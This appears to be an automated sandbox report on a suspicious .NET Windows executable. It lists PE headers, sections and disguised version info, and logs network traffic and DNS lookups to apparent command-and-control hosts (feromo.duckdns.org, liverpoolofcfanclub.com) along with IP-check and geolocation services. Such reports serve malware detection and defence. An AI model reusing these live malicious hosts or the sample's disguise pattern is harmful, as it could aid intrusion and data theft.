                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x151640x57.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x610.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x13e000x1518
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x131c40x13200False0.223754084967data5.04447660027IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x160000x6100x800False0.32373046875data3.4701340184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x180000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                    RT_VERSION0x160a00x380data
                                                                                                    RT_MANIFEST0x164200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Version Infos

                                                                                                    DescriptionData
                                                                                                    Translation0x0000 0x04b0
                                                                                                    LegalCopyrightCopyright 2021
                                                                                                    Assembly Version3.3.0.0
                                                                                                    InternalNameMotherFuckerBitch.exe
                                                                                                    FileVersion3.3.0.0
                                                                                                    CompanyNameWindowsAPI
                                                                                                    LegalTrademarksWindowsAPI
                                                                                                    CommentsWindowsAPI
                                                                                                    ProductNameWindowsAPI
                                                                                                    ProductVersion3.3.0.0
                                                                                                    FileDescriptionWindowsAPI
                                                                                                    OriginalFilenameMotherFuckerBitch.exe

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Mar 5, 2021 14:27:18.536206007 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.574662924 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.574821949 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.575324059 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.617522001 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803261995 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803302050 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803325891 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803349018 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803371906 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803396940 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803422928 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803433895 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.803445101 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803467989 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803478956 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.803492069 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.803517103 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.803540945 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.804130077 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.804158926 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.804255009 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.805051088 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.805083990 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.805146933 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.806015968 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.806047916 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.806134939 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.806965113 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.807015896 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.807074070 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.807913065 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.807960033 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.808053017 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.809593916 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.809859991 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.809886932 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.809911013 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.809927940 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.809957981 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.810745001 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.810776949 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.810858965 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.811680079 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.811714888 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.811772108 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.812654018 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.812684059 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.812750101 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.843022108 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843055010 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843077898 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843100071 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843125105 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843188047 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.843262911 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.843465090 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843492985 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.843530893 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.844446898 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.844480038 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.844537973 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.845783949 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.845813036 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.845864058 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.849112034 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849145889 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849169016 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849191904 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849215031 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849236012 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849256039 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.849315882 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.849333048 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849354982 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.849379063 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.850135088 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.850168943 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.850217104 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.851083994 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.851118088 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.851159096 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.852065086 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.852140903 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.884360075 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884390116 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884510994 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.884758949 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884787083 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.884887934 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.885612965 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.885643959 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.885736942 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.886550903 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.886584044 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.886677027 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.887463093 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.887495995 CET8049706104.21.31.39192.168.2.3
                                                                                                    Mar 5, 2021 14:27:18.887579918 CET4970680192.168.2.3104.21.31.39
                                                                                                    Mar 5, 2021 14:27:18.888396978 CET8049706104.21.31.39192.168.2.3

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                    Mar 5, 2021 14:27:18.472028017 CET192.168.2.38.8.8.80x4360Standard query (0)liverpoolofcfanclub.comA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:17.554444075 CET192.168.2.38.8.8.80x7c2dStandard query (0)liverpoolofcfanclub.comA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:19.739914894 CET192.168.2.38.8.8.80x553dStandard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:27.827776909 CET192.168.2.38.8.8.80x1becStandard query (0)liverpoolofcfanclub.comA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:30.171793938 CET192.168.2.38.8.8.80xe960Standard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.940161943 CET192.168.2.38.8.8.80x5c40Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.072390079 CET192.168.2.38.8.8.80x5fbcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:34.189199924 CET192.168.2.38.8.8.80x21d1Standard query (0)157.184.7.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:35.951399088 CET192.168.2.38.8.8.80xe482Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:44.782563925 CET192.168.2.38.8.8.80x9514Standard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:53.300302029 CET192.168.2.38.8.8.80xf5e8Standard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:53.457202911 CET192.168.2.38.8.8.80xcb48Standard query (0)freegeoip.appA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:03.668133020 CET192.168.2.38.8.8.80xd6fStandard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:13.234312057 CET192.168.2.38.8.8.80x92bdStandard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:33.390815973 CET192.168.2.38.8.8.80x8c2cStandard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.430285931 CET192.168.2.38.8.8.80x23ebStandard query (0)157.184.7.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.693120003 CET192.168.2.38.8.8.80xa620Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.709265947 CET192.168.2.38.8.8.80x2461Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.761507988 CET192.168.2.38.8.8.80xe0cdStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:38.104330063 CET192.168.2.38.8.8.80x5914Standard query (0)freegeoip.appA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:43.108870029 CET192.168.2.38.8.8.80x7060Standard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:51.689048052 CET192.168.2.38.8.8.80x93d6Standard query (0)feromo.duckdns.orgA (IP address)IN (0x0001)

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                    Mar 5, 2021 14:27:18.518378019 CET8.8.8.8192.168.2.30x4360No error (0)liverpoolofcfanclub.com104.21.31.39A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:27:18.518378019 CET8.8.8.8192.168.2.30x4360No error (0)liverpoolofcfanclub.com172.67.174.240A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:17.603283882 CET8.8.8.8192.168.2.30x7c2dNo error (0)liverpoolofcfanclub.com104.21.31.39A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:17.603283882 CET8.8.8.8192.168.2.30x7c2dNo error (0)liverpoolofcfanclub.com172.67.174.240A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:19.957401991 CET8.8.8.8192.168.2.30x553dNo error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:27.876348972 CET8.8.8.8192.168.2.30x1becNo error (0)liverpoolofcfanclub.com104.21.31.39A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:27.876348972 CET8.8.8.8192.168.2.30x1becNo error (0)liverpoolofcfanclub.com172.67.174.240A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:30.393829107 CET8.8.8.8192.168.2.30xe960No error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.989062071 CET8.8.8.8192.168.2.30x5c40No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.989062071 CET8.8.8.8192.168.2.30x5c40No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.989062071 CET8.8.8.8192.168.2.30x5c40No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.989062071 CET8.8.8.8192.168.2.30x5c40No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.989062071 CET8.8.8.8192.168.2.30x5c40No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:32.989062071 CET8.8.8.8192.168.2.30x5c40No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.119859934 CET8.8.8.8192.168.2.30x5fbcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.119859934 CET8.8.8.8192.168.2.30x5fbcNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.119859934 CET8.8.8.8192.168.2.30x5fbcNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.119859934 CET8.8.8.8192.168.2.30x5fbcNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.119859934 CET8.8.8.8192.168.2.30x5fbcNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:33.119859934 CET8.8.8.8192.168.2.30x5fbcNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:34.243957043 CET8.8.8.8192.168.2.30x21d1Name error (3)157.184.7.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:35.997375011 CET8.8.8.8192.168.2.30xe482No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:35.997375011 CET8.8.8.8192.168.2.30xe482No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:44.998290062 CET8.8.8.8192.168.2.30x9514No error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:53.349255085 CET8.8.8.8192.168.2.30xf5e8No error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:53.504070044 CET8.8.8.8192.168.2.30xcb48No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:28:53.504070044 CET8.8.8.8192.168.2.30xcb48No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:03.715965033 CET8.8.8.8192.168.2.30xd6fNo error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:13.448314905 CET8.8.8.8192.168.2.30x92bdNo error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:33.609360933 CET8.8.8.8192.168.2.30x8c2cNo error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.476690054 CET8.8.8.8192.168.2.30x23ebName error (3)157.184.7.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.743765116 CET8.8.8.8192.168.2.30xa620No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.743765116 CET8.8.8.8192.168.2.30xa620No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.757025003 CET8.8.8.8192.168.2.30x2461No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.757025003 CET8.8.8.8192.168.2.30x2461No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.757025003 CET8.8.8.8192.168.2.30x2461No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.757025003 CET8.8.8.8192.168.2.30x2461No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.757025003 CET8.8.8.8192.168.2.30x2461No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.757025003 CET8.8.8.8192.168.2.30x2461No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.810544968 CET8.8.8.8192.168.2.30xe0cdNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.810544968 CET8.8.8.8192.168.2.30xe0cdNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.810544968 CET8.8.8.8192.168.2.30xe0cdNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.810544968 CET8.8.8.8192.168.2.30xe0cdNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.810544968 CET8.8.8.8192.168.2.30xe0cdNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:37.810544968 CET8.8.8.8192.168.2.30xe0cdNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:38.161706924 CET8.8.8.8192.168.2.30x5914No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:38.161706924 CET8.8.8.8192.168.2.30x5914No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:43.322407007 CET8.8.8.8192.168.2.30x7060No error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)
                                                                                                    Mar 5, 2021 14:29:51.735320091 CET8.8.8.8192.168.2.30x93d6No error (0)feromo.duckdns.org185.157.161.113A (IP address)IN (0x0001)

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • liverpoolofcfanclub.com
                                                                                                    • checkip.dyndns.org
                                                                                                    • whatismyipaddress.com

                                                                                                    Code Manipulations

                                                                                                    Statistics

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Start time:14:27:15
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\Desktop\Mixed Items.exe'
                                                                                                    Imagebase:0x3e0000
                                                                                                    File size:86808 bytes
                                                                                                    MD5 hash:017E52146C9131DBC9487D834CDFC247
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:14:27:29
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:40
                                                                                                    Start date:05/03/2021
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                    Imagebase:0x7ff7488e0000
                                                                                                    File size:51288 bytes
                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:14:27:42
                                                                                                    Start date:05/03/2021
